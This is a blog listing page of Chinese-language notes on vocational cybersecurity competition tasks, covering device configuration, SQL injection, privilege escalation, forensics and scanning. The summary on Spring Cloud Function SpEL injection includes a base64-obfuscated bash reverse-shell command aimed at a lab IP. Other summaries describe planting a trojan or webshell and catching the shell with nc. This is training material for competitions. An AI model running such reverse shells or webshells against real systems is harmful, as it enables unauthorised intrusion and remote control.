- 博客(43)
- 收藏
- 关注
RSS订阅原创 2019 年全国职业院校技能大赛高职组 “信息安全管理与评估”赛项任务书(笔记详解)
1、根据网络拓扑图所示,按照 IP 地址参数表,对 DCFW 的名称、各接口IP 地址进行配置。2、根据网络拓扑图所示,按照 IP 地址参数表,对 DCRS 的名称进行配置,创建 VLAN 并将相应接口划入 VLAN。1. 总部核心交换机 DCRS 上开启 SSH 远程管理功能, 本地认证用户名:2019DCN,密码:DCN2014;2. 总部启用 MSTP 协议,NAME 为 DCN2014、 Revision-level 1,实例 1 中包括 VLAN10;实例 2 中包括 VLAN20、要求两条链路负
2024-02-08 02:03:27
1276
原创 2018 年全国职业院校技能大赛高职组“信息安全管理与评估”赛项任务书(笔记解析)
1、根据网络拓扑图所示,按照 IP 地址参数表,对 WAF 的名称、各接口 IP 地址 进行配置。2、根据网络拓扑图所示,按照 IP 地址参数表,对 DCRS 的名称、各接口 IP 地址 进行配置。1、在 DCFW 上配置,连接 LAN 接口开启 PING,HTTP,HTTPS,telnet 功能,连接 Internet 接口开启 PING、HTTPS 功能;连接 netlog 接口为 DMZ 区域,合理配置 策略,让内网用户能通过网络管理netlog。
2024-02-04 20:45:59
1106
原创 2017 年全国职业院校技能大赛高职组“信息安全管理与评估”赛项任务书(笔记解析)
1 根据网络拓扑图所示,按照 IP 地址参数表,对 WAF 的名称、各接口 IP 地址进 行配置。2 根据网络拓扑图所示,按照 IP 地址参数表,对 DCRS 的名称、各接口 IP 地址进 行配置。1.在总公司的 DCFW 上配置,连接 LAN 接口开启 PING,HTTP,HTTPS 功能,连接 Internet 接口开启 PING、HTTPS 功能;并且新增一个用户,用户名 dcn2017, 密码 dcn2017,该用户只有读-执行权限;
2024-02-01 08:57:15
884
原创 网络安全B模块(笔记详解)- Sql注入之绕过
1.使用渗透机场景kali中的工具扫描服务器场景,打开搜索页面,并将页面url做为Flag提交(IP地址不提交例如:http:123.com:8080/a/b/a.html提交/a/b/a.html);2.使用渗透机场景windows7访问服务器场景搜索页面,利用该页面的漏洞,查询数据库的字段,并将字段数作为Flag提交;
2024-01-30 00:20:38
539
1
原创 网络安全B模块(笔记详解)- 暴力破解
1.使用渗透机场景kali中工具扫描服务器场景,将iis的版本号作为Flag提交;2.使用渗透机场景windows7访问服务器场景,并下载某文件夹下的web目录下的username.txt和wxl_pass_burp.txt,并将username.txt中的用户数量作为Flag提交;3.使用渗透机场景windows7访问服务器中的暴力破解首页,并将首页的Flag提交;
2024-01-29 17:20:06
670
原创 网络安全B模块(笔记详解)- 越权与下载
1.使用渗透机场景kali中工具扫描服务器场景,将web端口号当作Flag提交;2.使用渗透机场景windows7访问服务器场景mingling.php,将页面中的Flag提交;3.使用渗透机场景windows7访问服务器场景mingling.php,分析页面内容,查看系统配置信息,并将产品id的最后5位数作为Flag提交;4.使用渗透机场景windows7访问服务器场景mingling.php,编辑命令查看用户,并将所有的用户名作为Flag提交(格式:Flag1_Flag2_Flag3_Flag4_Fla
2024-01-28 21:11:08
628
原创 网络安全B模块(笔记详解)- HASH算法的基本使用
1.通过服务器场景(A-Server),进行HASH算法的基本使用。将123456作为openssl md5 的输入参数,使用 123456进行md5计算并将内容输出到屏幕。将此命令中输出结果的命令作为Flag提交;2.通过服务器场景使用不同的加密方式对123456进行加密,对比两个加密字符串有何不同。使用SHA的加密方式,将生成的字符串最后四位当做Flag进行提交;3.通过服务器场景使用md5 校验文件是否被更改,生成文件in.txt并在文件中写入hello world,计算此文件内的MD5值,
2024-01-27 09:42:23
421
原创 网络安全B模块(笔记详解)- Linux操作系统渗透提权
1. 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;2. 使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;3. 使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag提交;4. 使用渗透机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;5. 使用渗透机对服务器管理员提权,并将服务器中root的密码作为flag提交;6. 使用渗透机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。
2024-01-26 00:03:20
572
原创 网络安全B模块(笔记详解)- 应急响应
1.黑客通过网络攻入本地服务器,在Web服务器的主页上外挂了一个木马连接,请你找到此连接并删除该连接,将对应的标题名称作为flag值提交;1.找出黑客植入到系统中的二进制木马程序,并将木马程序的名称作为Flag值(若存在多个提交时使用英文逗号隔开,例如bin,sbin,...)提交;1.找出被黑客修改的系统别名,并将倒数第二个别名作为Flag值提交;2.找出系统中被植入的后门用户删除掉,并将后门用户的账号作为Flag值提交(多个用户名之间以英文逗号分割,如:admin,root);
2024-01-25 00:26:40
1905
原创 网络安全B模块(笔记详解)- 文件MD5校验
1.进入虚拟机操作系统:CentOS 6.8中的/root目录,找到test.txt文件,并使用md5sum工具来计算出该文件的md5值,并将计算该文件md5的命令的字符串作为Flag进行提交;2.进入虚拟机操作系统:CentOS 6.8中的/root目录,找到test.txt文件,并使用md5sum校验工具来计算出该文件的md5值,并将计算该文件得到的md5值的字符串中前6位作为Flag进行提交;3.进入虚拟机操作系统:CentOS 6.8中的/root目录,将test.txt文件的文件名称改为
2024-01-24 00:03:30
465
原创 网络安全B模块(笔记详解)- 内存取证
1.从内存文件中获取用户admin的密码并破解,将该密码作为flag值提交(密码长度为6个字符);2.获取内存文件中系统的IP地址,将IP地址作为flag值提交;3.获取内存文件中系统的主机名,将主机名作为flag值提交;4.内存文件的系统中存在挖矿进程,将矿池的IP地址作为flag值提交;5.内存文件的系统中恶意进程在系统中注册了服务,请将服务名称作为flag值提交。
2024-01-23 15:32:10
600
原创 网络安全B模块(笔记详解)- 判断操作系统及应用程序渗透测试
1.使用渗透机场景BT5中的渗透测试工具对服务器场景WebServ2003进行ping扫描渗透测试(使用工具Nmap,使用参数v;n,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;2.使用渗透机场景BT5中的渗透测试工具对服务器场景WebServ2003进行ping扫描渗透测试(使用工具Nmap,使用参数v;n,使用必须要使用的参数),并将该操作显示结果的最后1行左数第1个单词作为Flag提交;
2024-01-22 00:13:32
1184
原创 网络安全B模块(笔记详解)- Apache安全配置
1.打开服务器场景(A-Server),通过命令行清除防火墙规则。在服务器场景上查看apache版本,将查看到的服务版本字符串完整提交;2.检测服务器场景中此版本apache是否存在显示banner信息漏洞,如果验证存在,修改配置文件将此漏洞进行加固,并重启Apache服务,将此加固项内容字符串(不包含状态)作为Flag提交;
2024-01-21 01:21:46
586
原创 网络安全B模块(笔记详解)- 远程代码执行渗透测试
1.从靶机服务器场景FTP服务器中下载文件RCE.py,编辑该Python程序文件,使该程序实现对Server7进行远程代码执行渗透测试的功能,填写该文件当中空缺的F1字符串,将该字符串作为flag值提交;2.继续编辑命名为RCE.py的Python程序文件,使该程序实现对Server12进行远程代码执行渗透测试的功能,填写该文件当中空缺的F2字符串,将该字符串作为flag值提交;
2024-01-20 16:40:48
729
原创 网络安全B模块(笔记详解)- SQL注入
1.使用渗透机场景kali中工具扫描服务器场景,将apache的端口号和版本号作为Flag提交(格式:端口号_版本号)2.使用渗透机场景windows7访问服务器场景SQL网站,并将网站中概述页面中的Flag提交;1.使用渗透机场景kali中工具扫描服务器,将服务器上135端口的服务作为Flag提交;1.使用渗透机场景kali中工具扫描服务器,将服务器上http服务端口作为Flag提交;1.使用渗透机场景windows7中火狐浏览器访问服务器场景中的get.php,根据页面回显获取Flag并提交;
2024-01-19 00:29:49
2284
原创 网络安全B模块(笔记详解)- 缓冲区溢出渗透测试
1.从靶机服务器场景FTP服务器中下载文件BO.py,编辑该Python程序文件,使该程序实现对Server6进行缓冲区溢出渗透测试的功能,填写该文件当中空缺的F1字符串,将该字符串作为flag值提交;2.继续编辑命名为BO.py的Python程序文件,使该程序实现对Server6进行缓冲区溢出渗透测试的功能,填写该文件当中空缺的F2字符串,将该字符串作为flag值提交;
2024-01-18 11:55:03
788
原创 网络安全B模块(笔记详解)- JavaScript安全绕过
1.使用渗透机场景kali中工具扫描服务器,将服务器上apache版本号作为flag提交;2.使用渗透机场景windows7访问服务其场景中的网站(网站路径为IP/javascript),找到网站首页中flag并提交;3.使用渗透机场景windows7根据第二题的入口继续访问服务器本题场景,通过提示得到flag并提交;4.使用渗透机场景windows7根据第三题入口继续访问服务器的本题场景,通过提示得到flag并提交;
2024-01-17 04:04:08
609
原创 网络安全B模块(笔记详解)- 文件包含
1.使用渗透机场景kali中工具扫描服务器,将服务器上 File Inclusion首页概述页中的Flag提交;2.使用渗透机场景windows7访问服务器场景网站中的File Inclusion(local)页面,找到根目录下Flag文件夹下的Flag.txt文件并将其内容提交;1.使用渗透机场景kali中的工具扫描服务器,将服务器场景对的web端口作为Flag提交;2.使用渗透机场景kali中的工具扫描服务器场景,打开about.php页面,并将页面中的Flag提交;
2024-01-16 12:25:21
1176
原创 网络安全B模块(笔记详解)- 利用python脚本进行web渗透测试
1.使用渗透机场景kali中工具扫描确定Web服务器场景地址,浏览网站Flag.html页面,并将Flag.html中的Flag提交;1.使用渗透机场景kali中工具扫描确定Web服务器场景地址,浏览网站Python.html页面,将本页面中的Flag提交;
2024-01-15 15:55:09
1029
原创 网络安全B模块(笔记详解)- 网络渗透测试
1.进入虚拟机操作系统:BT5中的/root目录,完善该目录下的land.py文件,填写该文件当中空缺的Flag1字符串,将该字符串作为Flag值(形式:Flag1字符串)提交;(land.py脚本功能见该任务第6题)1.进入渗透机场景BT5中的/root目录,完善该目录下的synflood.py文件,填写该文件当中空缺的Flag1字符串,将该字符串作为Flag值(形式:Flag1字符串)提交;(synflood.py脚本功能见该任务第6题)
2024-01-14 01:09:39
1021
原创 网络安全B模块(笔记详解)- MYSQL信息收集
1.通过渗透机场景Kali中的渗透测试工具对服务器场景MySQL03进行服务信息扫描渗透测试(使用工具Nmap,使用必须要使用的参数),并将该操作显示结果中数据库版本信息作为Flag提交;1.利用渗透机场景kali中的工具确定MySQL的端口,将MySQL端口作为Flag提交;1.进入虚拟机操作系统:CentOS 6.8,登陆数据库(用户名:root;密码:root),查看数据库版本号,将查看数据库版本号的命令作为Flag提交;
2024-01-13 09:22:06
1413
原创 网络安全B模块(笔记详解)- 隐藏信息探索
1.访问服务器的FTP服务,下载图片QR,从图片中获取flag,并将flag提交;2.访问服务器的FTP服务,下载文件document,从文件中获取flag,并将flag提交;1.找出文件夹1中的文件,将文件中的隐藏信息作为flag值提交;2.找出文件夹2中的文件,将文件中的隐藏信息作为flag值提交;
2024-01-12 07:53:18
965
原创 网络安全B模块(笔记详解)- Web信息收集
1.通过Kali对服务器场景Linux进行Web扫描渗透测试(使用工具nikto,查看该命令的完整帮助文件),并将该操作使用命令中固定不变的字符串作为Flag提交;1.通过Kali对服务器场景Linux进行Web扫描渗透测试(使用工具nikto,查看该命令的完整帮助文件)并将该操作使用命令中固定不变的字符串作为Flag提交;
2024-01-11 08:04:56
2206
原创 网络安全B模块(笔记详解)- nmap扫描渗透测试
1.通过BT5对服务器场景Linux进行TCP同步扫描 (使用工具Nmap,使用参数n,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;1.通过BT5对服务器场景Linux进行秘密FIN扫描 (使用工具Nmap,使用参数n,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;1.在Kali中使用Nmap工具查看本地路由与接口,并将该操作使用的全部命令作为Flag提交;
2024-01-10 07:57:27
1161
原创 网络安全B模块(笔记详解)- 漏洞扫描与利用
1.通过Kali对服务器场景server2003以半开放式不进行ping的扫描方式并配合a,要求扫描信息输出格式为xml文件格式,从生成扫描结果获取局域网(例如172.16.101.0/24)中存活靶机,以xml格式向指定文件输出信息(使用工具Nmap,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交(各参数之间用英文逗号分割,例a,b,c,d);1.使用命令nmap探测目标靶机的服务版本信息,将需要使用的参数作为FLAG进行提交;
2024-01-09 10:05:28
1005
原创 网络安全B模块(笔记详解)- Web渗透测试
6.通过Kali对服务器场景Linux进行Web扫描渗透测试,使用工具nikto并结合Nmap的扫描结果进行扫描,首先使用Nmap工具对靶机所在网段的80端口进行扫描,并将扫描结果以输出至所有格式的方式输出到指定文件target中,将输出至所有格式需要用到的参数作为Flag提交;1.通过渗透机Kali1.0对服务器场景PYsystem20192进行Web渗透测试(使用工具w3af的对目标Web服务器进行审计),在w3af的命令行界面下,使用命令列出所有用于审计的插件,将该操作使用的命令作为Flag值提交;
2024-01-06 07:58:16
1549
1
原创 网络安全B模块(笔记详解)- 网络爬虫渗透测试
1.进入渗透机场景BT5中的/root目录,完善该目录下的arp_spoof.py文件,填写该文件当中空缺的Flag1字符串,将该字符串作为Flag值(形式:Flag1字符串)提交;(arp_spoof.py脚本功能见该任务第6题)(arp_spoof.py脚本功能见该任务第6题)4.进入渗透机场景BT5中的/root目录,完善该目录下的arp_spoof.py文件,填写该文件当中空缺的Flag4字符串,将该字符串作为Flag值(形式:Flag4字符串)提交;根据缺少的发现是要time模块。
2024-01-05 07:59:53
753
1
原创 网络安全B模块(笔记详解)- 弱口令渗透测试
1.在本地PC渗透测试平台BT5中使用zenmap工具扫描服务器场景p100_win03-20所在网段(例如:172.16.101.0/24)范围内存活的主机IP地址和指定开放的1433、3306、80端口。并将该操作使用的命令中需要添加的字符串作为FLAG提交;1.在BT5中使用Zenmap工具扫描服务器场景Linux所在网段(例如:172.16.101.0/24)范围内存活的主机IP地址和指定开放的21、22、23端口。并将该操作使用的命令中必须要添加的字符串作为Flag提交(忽略ip地址);
2024-01-04 08:06:43
2170
1
原创 网络安全B模块(笔记详解)- 数字取证
1.使用Wireshark查看并分析Windows 7桌面下的attack.pcapng数据包文件,通过分析数据包attack.pcapng找出恶意用户的IP地址,并将恶意用户的IP地址作为Flag(形式:[IP地址])提交;解析:http.request.method==POST2.继续查看数据包文件attack.pacapng,分析出恶意用户扫描了哪些端口,并将全部的端口作为Flag(形式:[端口名1,端口名2,端口名3…,端口名n])从低到高提交;
2024-01-02 07:58:50
886
原创 2023年广东省网络安全C模块(笔记详解)
当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTA2LjE4LzEyMTIgMD4mMQ==}|{base64,-d}|{bash,-i}修改数据包发包监听。Php反序列化,查看页面。
2024-01-01 05:01:18
805
原创 2022年全国职业院校技能大赛网络安全竞赛试题1-10-B模块总结
3.进入虚拟机操作系统:Server5中的/root目录,将test.txt文件的文件名称改为txt.txt,然后再使用md5sum工具计算txt.txt文件的md5值,并将计算该文件得到的md5值的字符串中前5位数字和之前test.txt文件md5值的字符串中前5位数字相减的结果作为Flag值提交;2.进入虚拟机操作系统:Server5中的/root目录,找到test.txt文件,并使用md5sum校验工具来计算出该文件的md5值,并将计算该文件得到的md5值的字符串中前6位作为Flag值提交;
2023-12-31 16:31:50
513
原创 2023年广东省网络安全A模块(笔记详解)
模块A 基础设施设置与安全加固一、项目和任务描述:假定你是某企业的网络安全工程师,对于企业的服务器系统,根据任务要求确保各服务正常运行,并通过综合运用登录和密码策略、流量完整性保护策略、事件监控策略、防火墙策略等多种安全策略来提升服务器系统的网络安全防御能力。
2023-12-30 11:17:30
871
2
原创 2023年广东省网络安全B模块(笔记详解)
1.访问地址http://靶机IP/task1,分析页面内容,获取flag值,Flag格式为flag{xxx};flag{Yes,you got the first flag}2.访问地址http://靶机IP/task1,访问登录页面。用户user01的密码为1-1000以内的数,获取用户user01的密码,将密码作为Flag进行提交,Flag格式为flag{xxx};flag{Yeah!U have the password!}3.访问地址http://靶机IP/task3,访问购物页面。分
2023-12-29 09:35:56
1842
2
原创 2023年“中银杯”安徽省网络安全B模块(部分解析)
1.使用渗透机对服务器信息收集,并将服务器中网站服务端口号作为flag提交;2.使用渗透机对服务器信息收集,将网站的名称作为flag提交;3.使用渗透机对服务器渗透,将可渗透页面的名称作为flag提交;4.使用渗透机对服务器渗透,并将网站中所用的数据库的表名作为flag提交;5.使用渗透机对服务器渗透,将网站管理员的加密密码作为flag提交;6.使用渗透机对服务器渗透,将服务器的本地名称作为flag提交。
2023-12-28 13:43:13
782
1
原创 SQLi-LABS(笔记)Page-1(Basic Challenges)
关于SQLi-LABS的靶场环境以及SQL注入天书都放在阿里云盘中,需要环境的自取链接:https://www.alipan.com/s/m5AP2eSezDV 提取码: 2x4u个人笔记只做到1-16,SQL注入天书有后续内容。
2023-12-27 15:55:31
1091
1
原创 CTF渗透训练(笔记)
将该请求发送至repeater页面并且修改文件名为要执行的PHP代码,点击go将请求发出,点击Render查看图形化的响应页面,其中包含代码执行的结果.利用远程代码执行漏洞下载木马,因为需要绕过防火墙的原因所以对要执行的代码进行base64形式的编码,将生成的木马放到web网站的主目录下面
2023-12-26 16:18:44
1043
2
原创 网络安全B模块(笔记详解)- Linux操作系统渗透测试
1.通过本地PC中渗透测试平台Kali对服务器场景Server4进行系统服务及版本扫描渗透测试,并将该操作显示结果中21端口对应的服务版本信息字符串作为flag值提交;2.找到/var/www目录中的图片文件,将文件名称作为flag值提交;使用nikto来扫描网页发现访问查看使用burp来抓包把抓到的信息保存下来使用sqlmap来识别得到密码登入网页创建木马把这个复制到404页面 这个就可以用nc来连接 Nc -lnvp 8888 就可以了 使用msf创建木马访问404页面。
2023-12-25 08:04:58
1082
原创 网络安全B模块(笔记详解)- Windows操作系统渗透测试
(字典路径/usr/share/wordlists/dirb/small.txt)5. 通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中system文件使用reg相关命令提取,将完整命令作为FLAG提交;4. 通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中sam文件使用reg相关命令提取,将完整命令作为FLAG提交;
2023-12-24 00:24:16
953
原创 2019年国赛网络安全B模块解析(笔记详解)
使用nmap扫描靶机。1.从靶机服务器场景FTP服务器中下载文件smurf.py,编辑该Python程序文件,使该程序实现通过UDP对靶机服务器场景进行DOS(拒绝服务)渗透测试的功能,填写该文件当中空缺的F1字符串,将该字符串通过SHA256运算后返回哈希值的十六进制结果作为Flag值(形式:十六进制字符串)提交;图片缺少 Flag dir 5.继续分析数据包capture4.pcap,找出黑客成功登录FTP服务器后下载的关键文件,并将下载的文件名称作为Flag值提交;
2023-12-23 00:32:23
1006
1
原创 2018年国赛网络安全B模块解析(笔记详解)
从靶机服务器场景的FTP服务器中下载文件arpspoof.py,编辑该Python3程序文件,使该程序实现同本任务中arpspoof程序一致的功能,填写该文件当中空缺的F1字符串,将该字符串作为Flag值提交;14.将编辑好后的product.php程序文件上传至靶机FTP服务,并在攻击机端通过本任务第8题中使用的Web应用程序渗透测试方法获得靶机根路径下的文件flaginfo中的字符串,将此时Web页面弹出的字符串通过SHA256运算后返回的哈希值的十六进制结果的字符串作为Flag值提交。
2023-12-22 23:49:17
953
CTF渗透训练环境(镜像,视频,虚拟机)
2023-12-26
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人